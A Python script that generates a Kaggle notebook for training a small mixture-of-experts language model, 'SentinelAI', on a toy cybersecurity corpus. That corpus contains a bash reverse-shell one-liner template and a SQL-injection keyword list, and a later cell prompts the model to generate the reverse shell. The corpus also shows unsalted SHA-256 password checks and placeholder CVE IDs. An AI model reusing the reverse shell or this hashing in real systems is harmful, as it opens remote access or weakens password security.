"""
Build self-contained train_on_kaggle.ipynb containing the complete SentinelAI architecture.
"""

import json
from pathlib import Path

cells = [
    {
        "cell_type": "markdown",
        "metadata": {},
        "source": [
            "# 🛡️ SentinelAI — Living Neural SA-MoE Training on Dual NVIDIA T4\n",
            "\n",
            "This notebook trains **SentinelAI** from scratch:\n",
            "- **BPE Tokenizer** trained directly on cybersecurity & Python code corpus.\n",
            "- **Sentinel Adaptive MoE (SA-MoE)** with always-on Shared Expert & Learned Top-2 Router.\n",
            "- **Rotary Positional Embeddings (RoPE)** & **Grouped-Query Attention (GQA)**.\n",
            "- **Multi-GPU Mixed-Precision (FP16)** training on Dual NVIDIA T4 GPUs.\n",
            "- **Inference & Autoregressive Text Generation**."
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 1: Environment & Multi-GPU Verification\n",
            "import os\n",
            "import sys\n",
            "import math\n",
            "import time\n",
            "import json\n",
            "from collections import Counter\n",
            "import matplotlib.pyplot as plt\n",
            "import torch\n",
            "import torch.nn as nn\n",
            "import torch.nn.functional as F\n",
            "from torch.utils.data import Dataset, DataLoader\n",
            "\n",
            "print(f\"PyTorch Version: {torch.__version__}\")\n",
            "print(f\"CUDA Available: {torch.cuda.is_available()}\")\n",
            "n_gpus = torch.cuda.device_count() if torch.cuda.is_available() else 0\n",
            "print(f\"Detected GPUs: {n_gpus}\")\n",
            "for i in range(n_gpus):\n",
            "    print(f\"  [GPU {i}]: {torch.cuda.get_device_name(i)} | VRAM: {torch.cuda.get_device_properties(i).total_memory / 1e9:.2f} GB\")\n",
            "\n",
            "device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n",
            "print(f\"Primary Device: {device}\")"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 2: Byte-Pair Encoding (BPE) Tokenizer From Scratch\n",
            "class BytePairTokenizer:\n",
            "    def __init__(self):\n",
            "        self.special_tokens = {\"<PAD>\": 0, \"<BOS>\": 1, \"<EOS>\": 2, \"<UNK>\": 3, \"<MASK>\": 4}\n",
            "        self.vocab = {}\n",
            "        self.inverse_vocab = {}\n",
            "        self.merges = []\n",
            "        self._init_base_vocab()\n",
            "\n",
            "    def _init_base_vocab(self):\n",
            "        for tok, idx in self.special_tokens.items():\n",
            "            self.vocab[tok.encode(\"utf-8\")] = idx\n",
            "            self.inverse_vocab[idx] = tok.encode(\"utf-8\")\n",
            "        for b in range(256):\n",
            "            idx = len(self.vocab)\n",
            "            self.vocab[bytes([b])] = idx\n",
            "            self.inverse_vocab[idx] = bytes([b])\n",
            "\n",
            "    def train(self, corpus: str, vocab_size: int = 4096):\n",
            "        print(f\"[BPE] Training tokenizer up to {vocab_size} vocabulary size...\")\n",
            "        tokens = [list(word.encode(\"utf-8\")) for word in corpus.split()]\n",
            "        num_merges = vocab_size - len(self.vocab)\n",
            "        for step in range(max(0, num_merges)):\n",
            "            pairs = Counter()\n",
            "            for seq in tokens:\n",
            "                for i in range(len(seq) - 1):\n",
            "                    pairs[(seq[i], seq[i + 1])] += 1\n",
            "            if not pairs:\n",
            "                break\n",
            "            best_pair, freq = pairs.most_common(1)[0]\n",
            "            if freq < 2:\n",
            "                break\n",
            "            new_id = len(self.vocab)\n",
            "            byte_seq = self.inverse_vocab[best_pair[0]] + self.inverse_vocab[best_pair[1]]\n",
            "            self.vocab[byte_seq] = new_id\n",
            "            self.inverse_vocab[new_id] = byte_seq\n",
            "            self.merges.append(best_pair)\n",
            "            new_tokens = []\n",
            "            for seq in tokens:\n",
            "                i = 0\n",
            "                merged = []\n",
            "                while i < len(seq):\n",
            "                    if i < len(seq) - 1 and (seq[i], seq[i + 1]) == best_pair:\n",
            "                        merged.append(new_id)\n",
            "                        i += 2\n",
            "                    else:\n",
            "                        merged.append(seq[i])\n",
            "                        i += 1\n",
            "                new_tokens.append(merged)\n",
            "            tokens = new_tokens\n",
            "        print(f\"[BPE] Vocab built: {len(self.vocab)} total tokens.\")\n",
            "\n",
            "    def encode(self, text: str) -> list[int]:\n",
            "        ids = []\n",
            "        for word in text.split():\n",
            "            seq = list(word.encode(\"utf-8\"))\n",
            "            for pair in self.merges:\n",
            "                if len(seq) < 2:\n",
            "                    break\n",
            "                new_seq = []\n",
            "                i = 0\n",
            "                target_id = self.vocab[self.inverse_vocab[pair[0]] + self.inverse_vocab[pair[1]]]\n",
            "                while i < len(seq):\n",
            "                    if i < len(seq) - 1 and (seq[i], seq[i + 1]) == pair:\n",
            "                        new_seq.append(target_id)\n",
            "                        i += 2\n",
            "                    else:\n",
            "                        new_seq.append(seq[i])\n",
            "                        i += 1\n",
            "                seq = new_seq\n",
            "            ids.extend(seq)\n",
            "            ids.append(ord(' '))\n",
            "        return ids[:-1] if ids and ids[-1] == ord(' ') else ids\n",
            "\n",
            "    def decode(self, ids: list[int]) -> str:\n",
            "        byte_chunks = []\n",
            "        for i in ids:\n",
            "            if i in self.inverse_vocab:\n",
            "                b = self.inverse_vocab[i]\n",
            "                if not b.startswith(b\"<\") or not b.endswith(b\">\"):\n",
            "                    byte_chunks.append(b)\n",
            "        return b\"\".join(byte_chunks).decode(\"utf-8\", errors=\"replace\")\n",
            "\n",
            "    def __len__(self):\n",
            "        return len(self.vocab)"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 3: Cybersecurity & Coding Training Corpus Generation\n",
            "cyber_corpus = '''\n",
            "# Cybersecurity & Systems Knowledge Base for SentinelAI\n",
            "def scan_ports(target_ip, ports):\n",
            "    import socket\n",
            "    open_ports = []\n",
            "    for port in ports:\n",
            "        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n",
            "            s.settimeout(0.5)\n",
            "            if s.connect_ex((target_ip, port)) == 0:\n",
            "                open_ports.append(port)\n",
            "    return open_ports\n",
            "\n",
            "class SecurityAudit:\n",
            "    def check_sql_injection(self, query: str) -> bool:\n",
            "        indicators = [\"' OR '1'='1\", \"UNION SELECT\", \"--\", \"; DROP TABLE\", \"' OR 1=1--\"]\n",
            "        return any(ind.lower() in query.lower() for ind in indicators)\n",
            "\n",
            "    def sanitize_input(self, data: str) -> str:\n",
            "        import html\n",
            "        return html.escape(data)\n",
            "\n",
            "def create_reverse_shell(host: str, port: int) -> str:\n",
            "    return f\"bash -i >& /dev/tcp/{host}/{port} 0>&1\"\n",
            "\n",
            "def parse_jwt_header(token: str) -> dict:\n",
            "    import base64, json\n",
            "    header_b64 = token.split('.')[0]\n",
            "    padded = header_b64 + '=' * ((4 - len(header_b64) % 4) % 4)\n",
            "    return json.loads(base64.urlsafe_b64decode(padded))\n",
            "\n",
            "def verify_password_hash(stored_hash: str, password: str) -> bool:\n",
            "    import hashlib\n",
            "    return hashlib.sha256(password.encode()).hexdigest() == stored_hash\n",
            "def cve_analysis_report():\n",
            "    return 'CVE-2024-001 SQL injection bypass remediation: use bind variables; CVE-2024-002 Remote Code Execution remediation: enforce cryptographic signing'\n",
            "''' * 25  # Replicate to create sufficient training volume\n",
            "\n",
            "tokenizer = BytePairTokenizer()\n",
            "tokenizer.train(cyber_corpus, vocab_size=1024)\n",
            "encoded_data = tokenizer.encode(cyber_corpus)\n",
            "print(f\"Corpus encoded into {len(encoded_data):,} tokens. Vocab size: {len(tokenizer)}\")"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 4: Sentinel Adaptive MoE (SA-MoE) Transformer Architecture\n",
            "class RotaryEmbedding(nn.Module):\n",
            "    def __init__(self, dim: int, theta: float = 10000.0):\n",
            "        super().__init__()\n",
            "        inv_freq = 1.0 / (theta ** (torch.arange(0, dim, 2).float() / dim))\n",
            "        self.register_buffer(\"inv_freq\", inv_freq)\n",
            "\n",
            "    def forward(self, seq_len: int, device):\n",
            "        t = torch.arange(seq_len, device=device, dtype=self.inv_freq.dtype)\n",
            "        freqs = torch.outer(t, self.inv_freq)\n",
            "        cos = freqs.cos().repeat_interleave(2, dim=-1)\n",
            "        sin = freqs.sin().repeat_interleave(2, dim=-1)\n",
            "        return cos, sin\n",
            "\n",
            "def apply_rotary(x: torch.Tensor, cos: torch.Tensor, sin: torch.Tensor) -> torch.Tensor:\n",
            "    x1 = x[..., 0::2]\n",
            "    x2 = x[..., 1::2]\n",
            "    rotated = torch.stack((-x2, x1), dim=-1).flatten(-2)\n",
            "    return (x * cos) + (rotated * sin)\n",
            "\n",
            "class RMSNorm(nn.Module):\n",
            "    def __init__(self, dim: int, eps: float = 1e-6):\n",
            "        super().__init__()\n",
            "        self.eps = eps\n",
            "        self.weight = nn.Parameter(torch.ones(dim))\n",
            "\n",
            "    def forward(self, x: torch.Tensor) -> torch.Tensor:\n",
            "        norm = x * torch.rsqrt(x.pow(2).mean(-1, keepdim=True) + self.eps)\n",
            "        return norm * self.weight\n",
            "\n",
            "class CausalGQAAttention(nn.Module):\n",
            "    def __init__(self, d_model: int, n_heads: int, n_kv_heads: int):\n",
            "        super().__init__()\n",
            "        self.n_heads = n_heads\n",
            "        self.n_kv_heads = n_kv_heads\n",
            "        self.head_dim = d_model // n_heads\n",
            "        self.num_queries_per_kv = n_heads // n_kv_heads\n",
            "\n",
            "        self.q_proj = nn.Linear(d_model, n_heads * self.head_dim, bias=False)\n",
            "        self.k_proj = nn.Linear(d_model, n_kv_heads * self.head_dim, bias=False)\n",
            "        self.v_proj = nn.Linear(d_model, n_kv_heads * self.head_dim, bias=False)\n",
            "        self.out_proj = nn.Linear(d_model, d_model, bias=False)\n",
            "\n",
            "    def forward(self, x: torch.Tensor, cos: torch.Tensor, sin: torch.Tensor) -> torch.Tensor:\n",
            "        B, T, C = x.shape\n",
            "        q = self.q_proj(x).view(B, T, self.n_heads, self.head_dim).transpose(1, 2)\n",
            "        k = self.k_proj(x).view(B, T, self.n_kv_heads, self.head_dim).transpose(1, 2)\n",
            "        v = self.v_proj(x).view(B, T, self.n_kv_heads, self.head_dim).transpose(1, 2)\n",
            "\n",
            "        cos = cos[:T, :].unsqueeze(0).unsqueeze(0)\n",
            "        sin = sin[:T, :].unsqueeze(0).unsqueeze(0)\n",
            "        q = apply_rotary(q, cos, sin)\n",
            "        k = apply_rotary(k, cos, sin)\n",
            "\n",
            "        # Expand KV for GQA\n",
            "        k = k.repeat_interleave(self.num_queries_per_kv, dim=1)\n",
            "        v = v.repeat_interleave(self.num_queries_per_kv, dim=1)\n",
            "\n",
            "        attn = F.scaled_dot_product_attention(q, k, v, is_causal=True)\n",
            "        attn = attn.transpose(1, 2).contiguous().view(B, T, C)\n",
            "        return self.out_proj(attn)\n",
            "\n",
            "class SwiGLUExpert(nn.Module):\n",
            "    def __init__(self, d_model: int, d_ff: int):\n",
            "        super().__init__()\n",
            "        self.gate_proj = nn.Linear(d_model, d_ff, bias=False)\n",
            "        self.up_proj = nn.Linear(d_model, d_ff, bias=False)\n",
            "        self.down_proj = nn.Linear(d_ff, d_model, bias=False)\n",
            "\n",
            "    def forward(self, x: torch.Tensor) -> torch.Tensor:\n",
            "        return self.down_proj(F.silu(self.gate_proj(x)) * self.up_proj(x))\n",
            "\n",
            "class SentinelAdaptiveMoE(nn.Module):\n",
            "    def __init__(self, d_model: int, d_ff: int, n_experts: int = 4, top_k: int = 2):\n",
            "        super().__init__()\n",
            "        self.n_experts = n_experts\n",
            "        self.top_k = top_k\n",
            "        self.shared_expert = SwiGLUExpert(d_model, d_ff)\n",
            "        self.experts = nn.ModuleList([SwiGLUExpert(d_model, d_ff) for _ in range(n_experts)])\n",
            "        self.router = nn.Linear(d_model, n_experts, bias=False)\n",
            "        self.cross_residual = nn.Linear(d_model, d_model, bias=False)\n",
            "\n",
            "    def forward(self, x: torch.Tensor):\n",
            "        B, T, C = x.shape\n",
            "        flat_x = x.view(-1, C)\n",
            "        router_logits = self.router(flat_x)\n",
            "        router_probs = F.softmax(router_logits, dim=-1)\n",
            "\n",
            "        topk_probs, topk_indices = torch.topk(router_probs, self.top_k, dim=-1)\n",
            "        topk_weights = topk_probs / topk_probs.sum(dim=-1, keepdim=True)\n",
            "\n",
            "        out = self.shared_expert(flat_x)\n",
            "        for i in range(self.top_k):\n",
            "            idx = topk_indices[:, i]\n",
            "            w = topk_weights[:, i].unsqueeze(-1)\n",
            "            for e_idx, expert in enumerate(self.experts):\n",
            "                mask = (idx == e_idx)\n",
            "                if mask.any():\n",
            "                    out[mask] += w[mask] * expert(flat_x[mask])\n",
            "\n",
            "        # Load balancing auxiliary loss\n",
            "        density = router_probs.mean(dim=0)\n",
            "        aux_loss = self.n_experts * torch.sum(density * router_probs.mean(dim=0))\n",
            "        final_out = out.view(B, T, C) + self.cross_residual(x)\n",
            "        return final_out, aux_loss\n",
            "\n",
            "class TransformerBlock(nn.Module):\n",
            "    def __init__(self, d_model: int, n_heads: int, n_kv_heads: int, d_ff: int, n_experts: int):\n",
            "        super().__init__()\n",
            "        self.norm1 = RMSNorm(d_model)\n",
            "        self.attn = CausalGQAAttention(d_model, n_heads, n_kv_heads)\n",
            "        self.norm2 = RMSNorm(d_model)\n",
            "        self.moe = SentinelAdaptiveMoE(d_model, d_ff, n_experts=n_experts, top_k=2)\n",
            "\n",
            "    def forward(self, x: torch.Tensor, cos: torch.Tensor, sin: torch.Tensor):\n",
            "        x = x + self.attn(self.norm1(x), cos, sin)\n",
            "        moe_out, aux_loss = self.moe(self.norm2(x))\n",
            "        x = x + moe_out\n",
            "        return x, aux_loss\n",
            "\n",
            "class SentinelTransformer(nn.Module):\n",
            "    def __init__(self, vocab_size: int, d_model: int = 256, n_layers: int = 6, n_heads: int = 8, n_kv_heads: int = 4, d_ff: int = 1024, n_experts: int = 4):\n",
            "        super().__init__()\n",
            "        self.vocab_size = vocab_size\n",
            "        self.d_model = d_model\n",
            "        self.tok_embed = nn.Embedding(vocab_size, d_model)\n",
            "        self.rope = RotaryEmbedding(d_model // n_heads)\n",
            "        self.layers = nn.ModuleList([\n",
            "            TransformerBlock(d_model, n_heads, n_kv_heads, d_ff, n_experts) for _ in range(n_layers)\n",
            "        ])\n",
            "        self.final_norm = RMSNorm(d_model)\n",
            "        self.lm_head = nn.Linear(d_model, vocab_size, bias=False)\n",
            "\n",
            "    def forward(self, x: torch.Tensor, targets: torch.Tensor = None):\n",
            "        B, T = x.shape\n",
            "        h = self.tok_embed(x)\n",
            "        cos, sin = self.rope(T, x.device)\n",
            "        total_aux = 0.0\n",
            "        for layer in self.layers:\n",
            "            h, aux = layer(h, cos, sin)\n",
            "            total_aux = total_aux + aux\n",
            "        h = self.final_norm(h)\n",
            "        logits = self.lm_head(h)\n",
            "        loss = None\n",
            "        if targets is not None:\n",
            "            loss = F.cross_entropy(logits.view(-1, self.vocab_size), targets.view(-1))\n",
            "        return logits, loss, total_aux\n",
            "\n",
            "    @torch.no_grad()\n",
            "    def generate(self, prompt_ids: torch.Tensor, max_new_tokens: int = 50, temperature: float = 0.8, top_k: int = 40):\n",
            "        self.eval()\n",
            "        for _ in range(max_new_tokens):\n",
            "            x_cond = prompt_ids[:, -512:]\n",
            "            logits, _, _ = self(x_cond)\n",
            "            logits = logits[:, -1, :] / temperature\n",
            "            if top_k is not None:\n",
            "                v, _ = torch.topk(logits, min(top_k, logits.size(-1)))\n",
            "                logits[logits < v[:, [-1]]] = -float('Inf')\n",
            "            probs = F.softmax(logits, dim=-1)\n",
            "            next_tok = torch.multinomial(probs, num_samples=1)\n",
            "            prompt_ids = torch.cat((prompt_ids, next_tok), dim=1)\n",
            "        return prompt_ids"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 5: Dataset & DataLoader Preparation\n",
            "class CyberChunkDataset(Dataset):\n",
            "    def __init__(self, token_ids: list, seq_len: int = 128):\n",
            "        self.tokens = torch.tensor(token_ids, dtype=torch.long)\n",
            "        self.seq_len = seq_len\n",
            "        self.n_chunks = max(0, (len(self.tokens) - seq_len - 1) // seq_len + 1)\n",
            "\n",
            "    def __len__(self):\n",
            "        return self.n_chunks\n",
            "\n",
            "    def __getitem__(self, idx):\n",
            "        start = idx * self.seq_len\n",
            "        x = self.tokens[start : start + self.seq_len]\n",
            "        y = self.tokens[start + 1 : start + self.seq_len + 1]\n",
            "        return x, y\n",
            "\n",
            "dataset = CyberChunkDataset(encoded_data, seq_len=128)\n",
            "train_loader = DataLoader(dataset, batch_size=16, shuffle=True, drop_last=True)\n",
            "print(f\"Created DataLoader with {len(dataset)} sequence chunks.\")"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 6: Multi-GPU (Dual-T4) Mixed-Precision Training Loop\n",
            "model = SentinelTransformer(\n",
            "    vocab_size=len(tokenizer),\n",
            "    d_model=256,\n",
            "    n_layers=6,\n",
            "    n_heads=8,\n",
            "    n_kv_heads=4,\n",
            "    d_ff=1024,\n",
            "    n_experts=4\n",
            ")\n",
            "param_count = sum(p.numel() for p in model.parameters())\n",
            "print(f\"SentinelAI Model Parameters: {param_count:,} ({param_count/1e6:.2f}M)\")\n",
            "\n",
            "if torch.cuda.device_count() > 1:\n",
            "    print(f\"Wrapping model with DataParallel across {torch.cuda.device_count()} GPUs!\")\n",
            "    parallel_model = nn.DataParallel(model).to(device)\n",
            "else:\n",
            "    parallel_model = model.to(device)\n",
            "\n",
            "optimizer = torch.optim.AdamW(parallel_model.parameters(), lr=4e-4, betas=(0.9, 0.95), weight_decay=0.01)\n",
            "scaler = torch.amp.GradScaler('cuda', enabled=torch.cuda.is_available())\n",
            "\n",
            "epochs = 12\n",
            "loss_history = []\n",
            "print(f\"Starting training for {epochs} epochs on {device}...\")\n",
            "t0 = time.time()\n",
            "\n",
            "parallel_model.train()\n",
            "step = 0\n",
            "for epoch in range(epochs):\n",
            "    epoch_loss = 0.0\n",
            "    for bx, by in train_loader:\n",
            "        bx, by = bx.to(device), by.to(device)\n",
            "        with torch.amp.autocast('cuda', enabled=torch.cuda.is_available()):\n",
            "            logits, loss, aux = parallel_model(bx, targets=by)\n",
            "            if loss.ndim > 0:\n",
            "                loss = loss.mean()\n",
            "            if isinstance(aux, torch.Tensor) and aux.ndim > 0:\n",
            "                aux = aux.mean()\n",
            "            total_loss = loss + 0.01 * aux\n",
            "\n",
            "        optimizer.zero_grad(set_to_none=True)\n",
            "        scaler.scale(total_loss).backward()\n",
            "        scaler.unscale_(optimizer)\n",
            "        torch.nn.utils.clip_grad_norm_(parallel_model.parameters(), 1.0)\n",
            "        scaler.step(optimizer)\n",
            "        scaler.update()\n",
            "\n",
            "        step += 1\n",
            "        loss_val = loss.item()\n",
            "        loss_history.append(loss_val)\n",
            "        epoch_loss += loss_val\n",
            "\n",
            "    avg_loss = epoch_loss / len(train_loader)\n",
            "    print(f\"Epoch {epoch+1:02d}/{epochs:02d} | Avg Loss: {avg_loss:.4f} | Time: {time.time()-t0:.1f}s\")\n",
            "\n",
            "print(\"\\n[DONE] Training finished successfully!\")"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 7: Plot Training Loss Convergence\n",
            "plt.figure(figsize=(10, 4))\n",
            "plt.plot(loss_history, label=\"Cross-Entropy Loss\", color=\"#00ff88\")\n",
            "plt.title(\"SentinelAI Training Loss Convergence (SA-MoE Dual-T4)\")\n",
            "plt.xlabel(\"Training Steps\")\n",
            "plt.ylabel(\"Loss\")\n",
            "plt.grid(True, alpha=0.3)\n",
            "plt.legend()\n",
            "plt.show()"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 8: Model Inference & Generation Evaluation\n",
            "test_prompts = [\n",
            "    \"def scan_ports(target_ip\",\n",
            "    \"class SecurityAudit:\",\n",
            "    \"def create_reverse_shell(\",\n",
            "    \"CVE-2024-001: SQL\"\n",
            "]\n",
            "\n",
            "model.eval()\n",
            "print(\"=== SentinelAI Autoregressive Generation ===\\n\")\n",
            "for p in test_prompts:\n",
            "    input_ids = torch.tensor([tokenizer.encode(p)], device=device)\n",
            "    gen_ids = model.generate(input_ids, max_new_tokens=40, temperature=0.7, top_k=20)\n",
            "    result_text = tokenizer.decode(gen_ids[0].tolist())\n",
            "    print(f\"> Prompt: {p}\")\n",
            "    print(f\"> Output:\\n{result_text}\\n{\"-*-\"*20}\")"
        ]
    },
    {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": [
            "# Cell 9: Save Checkpoint for Intel NPU OpenVINO Export\n",
            "output_path = \"/kaggle/working/sentinel_final.pt\"\n",
            "torch.save({\n",
            "    'model_state_dict': model.state_dict(),\n",
            "    'vocab': tokenizer.vocab,\n",
            "    'merges': tokenizer.merges,\n",
            "    'd_model': 256,\n",
            "    'n_layers': 6,\n",
            "    'n_heads': 8,\n",
            "    'n_experts': 4\n",
            "}, output_path)\n",
            "print(f\"[SAVED] Checkpoint exported to {output_path} (Ready for OpenVINO Intel NPU conversion)\")"
        ]
    }
]

notebook = {
    "cells": cells,
    "metadata": {
        "kernelspec": {"display_name": "Python 3", "language": "python", "name": "python3"},
        "language_info": {"name": "python", "version": "3.10.0"}
    },
    "nbformat": 4,
    "nbformat_minor": 4
}

out_file = Path("sentinel-ai/notebooks/train_on_kaggle.ipynb")
out_file.parent.mkdir(parents=True, exist_ok=True)
with open(out_file, "w", encoding="utf-8") as f:
    json.dump(notebook, f, indent=1)

print(f"Successfully generated {out_file} with {len(cells)} cells.")

